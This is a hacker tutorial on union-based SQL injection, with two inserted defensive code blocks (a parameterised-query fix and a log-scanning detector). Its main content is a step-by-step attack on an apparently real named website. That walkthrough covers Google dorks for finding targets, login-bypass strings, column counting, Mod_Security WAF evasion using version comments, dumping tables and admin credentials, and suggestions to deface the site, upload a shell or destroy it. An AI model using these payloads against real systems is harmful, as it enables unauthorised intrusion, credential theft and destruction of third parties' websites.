Basic SQL Injection Tutorial

Hello Friends !!!

I am CodeNinja a.k.a. Aakash Choudhary, and now I am going to give a basic SQL injection tutorial :-

What is SQL Injection:-

SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).

With SQL injection we can fetch all the important data from a website and carry out malicious activity, or do almost anything we want. It depends on us.

Note:- This tutorial is for educational purposes only. So learn this technique, but don't harm any website.

So Let's Start —->

Part 1:- Using Google Dorks

Google Dorks are the best weapon for hackers, so use them wisely. We can find SQL-injectable websites using dorks, and you can even make your own dorks.

Download Google Dorks from here :- http://pastebin.com/tq2TBbmB

You can search for more dorks on Google 😛

How to use Google Dorks :- Let's see

Choose any dork, paste it into Google, and then choose any site from the results, like this —–>

http://lmgtfy.com/?q=inurl%3Atrainers.php%3Fid%3D

And choose any site from there —>

http://prntscr.com/525zvj

So now you understand Google Dorks.

Part 2:- Check Website Vulnerability

Now that we have a website, our next step is to check whether the website is vulnerable to SQL injection or not.

For this you have to put ' after the number.

eg. —–> http://www.tabletworld.co.in/order.php?pid=55'      <—— Notice the ' after the number

This is the essential check for vulnerability in a site.

If the site is vulnerable you will see this type of error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

That means the site is vulnerable.

Sometimes you will not see that error. So look at the site carefully and notice whether some images or words are missing or not.
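As an added example (not from the original post), here is what the quote check above is actually exercising, and how the lookup behind a page like order.php?pid=55 is fixed so that the check finds nothing: a constructed in-memory SQLite stand-in (the table, rows and function names are assumptions) with the concatenated query beside a validated, parameterised one that returns a generic message instead of the database's own error text.

```python
import sqlite3

# Constructed in-memory stand-in for the lookup behind order.php?pid=...
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (pid INTEGER PRIMARY KEY, item TEXT)")
conn.execute("INSERT INTO orders VALUES (55, 'tablet')")


def vulnerable_lookup(pid_raw):
    # String concatenation: the client's text becomes part of the SQL, so a
    # trailing quote (pid=55') leaves an unterminated token and the driver
    # raises a syntax error. That error, when echoed to the page, is the
    # symptom the quote test above looks for.
    return conn.execute("SELECT item FROM orders WHERE pid=" + pid_raw).fetchone()


def safe_lookup(pid):
    # Parameterised query: the integer is bound as a value, never spliced
    # into the statement text, so anything appended to the parameter
    # ("order by 24--", "union select ...") can never reach the parser as SQL.
    return conn.execute("SELECT item FROM orders WHERE pid=?", (pid,)).fetchone()


def handle_request(pid_raw):
    # 1) Validate the parameter against its real type: a numeric id.
    if not pid_raw.isdigit():
        return "invalid request"
    # 2) Run the bound query. 3) Never echo the driver's message; a generic
    #    response gives the error-based test nothing to read.
    try:
        row = safe_lookup(int(pid_raw))
    except sqlite3.Error:
        return "invalid request"
    return row[0] if row else "not found"
```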

Part 3:- Find the Injection Point

Well, what is an injection point? See this carefully

Normal Site :-

http://www.tabletworld.co.in

Injection Point of the normal site :-

http://prntscr.com/52689v

Hope you understand the injection point.

But now the question arises: how to find the injection point in a particular site?

Well, to find an injection point we use the following methods —->

1. Open every link of the particular site and use ' to check vulnerability

2. Use Google Dorks :p

3. Input malicious SQLi strings in the search bar or in the login section

These are some malicious SQLi strings for input:

‘ or ‘1’=’1
‘ or ‘x’=’x
‘ or 0=0 —

” or 0=0 —

or 0=0 —

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’=’x

” or “x”=”x

‘) or (‘x’=’x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’=’a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 —

hi’ or 1=1 —
‘or’1=1’

Now I will tell you how to find the injection point using Google Dorks. Just use the following dorks in Google and you will see your desired results. Just try all of the results one by one.

1. inurl:.php?id= site:www.sitename.com

2. site:www.sitename.com "php?"

3. site:www.target.com php

4. site:www.sitename.com .php? / .php?id=

5. Using Bing —> ip:127.0.0.1 "php?id"   where you use the IP of the particular site

6. site:"*.site.com" inurl:"php?"

7. site.com/robots.txt

8. inurl:".php?id="+site:www.site.com

Here is a live example of using the above dorks:

inurl:.php?id= site:http://www.tabletworld.co.in

Here is the result :-

http://prntscr.com/526b0l

So use any site from there.

I chose this one:

http://www.tabletworld.co.in/order.php?pid=55

Hope you understand this part.

Part 4:- Real SQLi steps, now that we have a vulnerable site

Here is our target:

http://www.tabletworld.co.in/order.php?pid=55

Step 1:- Use ' after the number

http://www.tabletworld.co.in/order.php?pid=55'

Error :-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

This means the site is vulnerable.

Step 2:- Find the number of columns

To find the number of columns we use these commands:

1. order by

2. group by

3. procedure analyse()

Well, this time I am using only the order by command. When you see that the order by command is not working, then we use the group by command.

About procedure analyse() I will tell you later.

Order by command ——–>

http://www.tabletworld.co.in/order.php?pid=55 order by 1--       <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 10--     <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 20--     <——- No error

http://www.tabletworld.co.in/order.php?pid=55 order by 30--     <——- Error

Unknown column '30' in 'order clause'

This means the number of columns is less than 30 and more than 20.

Sometimes you will not see that error, but something will be missing on the page. So check carefully.

http://www.tabletworld.co.in/order.php?pid=55 order by 25--      <—— Error

Unknown column '25' in 'order clause'

This means the number of columns is less than 25.

http://www.tabletworld.co.in/order.php?pid=55 order by 24--       <—– No error 😀

This means we have 24 columns.

Step 3:- Find vulnerable columns

Now our next step is to find the vulnerable columns among those 24 columns, because we put our SQLi queries in those vulnerable columns.

We use this command ——–>  union select

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Notice the - before 55. It is necessary when using the union select command. But sometimes we don't use - before the number; we use other methods/tricks instead of -. When to use which, I will tell you in another tutorial.

Now, after using union select, I see this WAF message:

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

What is a WAF —–> Web Application Firewall,

which is used to protect a website from hacking attacks. But there are lots of methods to bypass a WAF.

These are WAF messages —->

406 Not acceptable

403 Forbidden

404

500

For each of the above WAF messages we use different methods to bypass the WAF.

Now come back to the site where we saw the above error.

To bypass the WAF we use comments —->

/*!*/ like  —> /*!union*/

or

/*!50000*/   —–> /*!50000union*/

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Well, the vulnerable columns are —-> 5 & 7

Now all our malicious queries will be put in those vulnerable columns, like this:

For the version —–> version() & @@version

http://www.tabletworld.co.in/order.php?pid=-55 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Now see carefully. I used the version() command in place of vulnerable column 5.

We can also use our queries in both vulnerable columns, i.e. 5 & 7.

Well, why do we check the version there? Because after checking the version we know what to do next.

Like —> if the version is above 5, then we can use information_schema to dump tables and columns.

But if the version is below 5, then we dump tables blindly; there we can't use information_schema.

Step 4:- Find table data

Now our next step is to find the table data of the website.

The commands we use to find table data are —–>

table_name

from

information_schema.tables

where

table_schema=database()

Now, how and where do we use the above commands?

Let's see

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables where table_schema=database()--

Notice:- table_name —-> is in vulnerable column 5, and the rest of our commands come after number 24 but before --

So remember this.  😛

Well, now the result is again a WAF message:

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Now I use /*!50000*/ on the from keyword too, like —-> /*!50000from*/

Well, how do you know where to put the WAF bypass? Don't worry. I will tell you in my other tutorial about first understanding the WAF's behavior and then applying the WAF bypass methods.

Here is the code:-

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database()--

Result :-

http://prntscr.com/528q74

Notice that 

Now I also use one more command —->

concat() ——> The CONCAT function is used to concatenate two strings to form a single string.

group_concat() ——–> GROUP_CONCAT is used when you want to have data from different rows of a column in a single row. For this you need GROUP BY to work.

concat_ws() ——-> CONCAT_WS is just for joining two values.

Well, on this site when we use the group_concat() function we see this error —->

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database()--

WAF Message —->

Not Acceptable!

An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

Bypass using /*!50000group_concat*/()

Like —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000group_concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database()--

Now the error —–>

FUNCTION marvelso_tabletworld.group_concat does not exist. Check the 'Function Name Parsing and Resolution' section in the Reference Manual

That means you can't use the group_concat function there. So we will use concat() instead.

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database()--

Now the result —->

http://prntscr.com/529rmf

You see the admin table there. What if you don't see an admin table there?

Two reasons —->

Maybe there is no admin table in the database

OR

Because of the concat function we are unable to see the other tables too

If we use group_concat we can see all the table details on the page,

but with the concat function we are able to see only one table detail. To see the other table details we use this command —->

limit 0,1

like this

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 0,1--

You can increase the limit like this —> limit 1,1, limit 2,1, limit 3,1, etc.

See code —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 1,1--

And see the result —>

http://prntscr.com/529t6g

Notice that red mark. That is the 2nd table of the database.

Another one using limit 2,1 —>

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.tables where table_schema=database() limit 3,1--

Another result —>

http://prntscr.com/529tl2

Another, the 3rd table —> customer

Hope now you understand how to use the concat() function with limit 0,1. If not, you can ask me your doubts.

Step 5:- Find column details

Command for this —->

column_name

from

information_schema.columns

where

table_name='table name here'

Note :-

Your table name should be in hex format. I will show you how.

See this code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e--

Where —->

0x61646d696e is —-> admin

Result —->

http://prntscr.com/529wlr

We again use the limit function to get more column details.

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e limit 1,1--

Result —>

http://prntscr.com/529x8k

Again, the next column details using limit 2,1

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ information_schema.columns where table_name=0x61646d696e limit 2,1--

Result —->

http://prntscr.com/529xp7

So now we have our desired column details —->

id,username,password

These details are enough for hacking, as we will get the admin details using them.

Step 6:- Find admin details [name, password, etc.]

Commands ——>

concat(username,0x3a,0x3a,password)   <—– Where 0x3a is the hex encoding of :

from

the table name here, like admin

Code —->

http://www.tabletworld.co.in/order.php?pid=-55 /*!50000union*/ select 1,2,3,4,/*!50000concat*/(username,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 /*!50000from*/ admin--

Result:-

http://prntscr.com/52a00l

So we get the admin details from the database —>

username:- admin

password:- admin
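As an added example (not from the original post), here is a small Python detector that runs over constructed access-log lines and flags the probes walked through in Part 4: the stray quote after a numeric id, the order by column counting, union select, the /*!50000...*/ version comment used against the WAF, information_schema enumeration and hex-encoded strings. The combined log format, the sample lines and the function names are assumptions; a defender would run the same logic over real access logs and correlate hits with the WAF's 406 responses.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the probes used in the walkthrough: a stray quote after a
# numeric id, ORDER BY column counting, UNION SELECT, MySQL version-comment
# WAF evasion such as /*!50000union*/, information_schema enumeration and
# hex string literals such as 0x61646d696e.
SIGNATURES = {
    "quote_after_number": re.compile(r"^\s*-?\d+\s*['\"]"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"union\b.*?\bselect\b", re.I | re.S),
    "version_comment": re.compile(r"/\*!\d{0,5}\w+\*/"),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),
}

# Apache/nginx combined-style access log line; only the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic): one benign request, then the
# probe sequence from the tutorial as it would appear URL-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Nov/2014:10:01:02 +0000] "GET /order.php?pid=55 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Nov/2014:10:01:09 +0000] "GET /order.php?pid=55%27 HTTP/1.1" 200 3311',
    '203.0.113.5 - - [10/Nov/2014:10:02:15 +0000] "GET /order.php?pid=55%20order%20by%2024-- HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Nov/2014:10:03:40 +0000] "GET /order.php?pid=-55%20/*!50000union*/%20select%201,2,3-- HTTP/1.1" 406 226',
    '203.0.113.5 - - [10/Nov/2014:10:05:01 +0000] "GET /order.php?pid=-55%20union%20select%20table_name%20from%20information_schema.tables%20where%20table_name=0x61646d696e-- HTTP/1.1" 200 4870',
]


def scan_line(line):
    """Decode each query parameter of one request and return the signatures it trips."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = set()
    for _name, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
        findings.update(sig for sig, rx in SIGNATURES.items() if rx.search(value))
    return {"ip": m["ip"], "status": m["status"], "findings": sorted(findings)}


def scan_log(lines):
    """One alert per request that tripped at least one signature, in log order."""
    return [hit for hit in map(scan_line, lines) if hit and hit["findings"]]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"], ",".join(alert["findings"]))
```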

Part 5:-

What do we do after getting the admin details, i.e. username and password?

Well, go and find the admin page of the website, put the admin details there and enter the world of the admin panel, where you can control everything. What can we do —>

1. Deface the website

2. Shell uploading

3. Destroy the website

And much, much more

Well, how to get the admin page of a website —–>

Just try the following —>

http://sitename.com/admin

http://sitename.com/administrator

http://sitename.com/login

http://sitename.com/robots.txt

These are a few. There are many other methods. You can also use admin finder tools to find the admin page.

Well, how to use all this and do such things: don't worry, I will tell you in my next tutorials.

So stay tuned.

Regards, CodeNinja a.k.a. Aakash Choudhary

THANKS
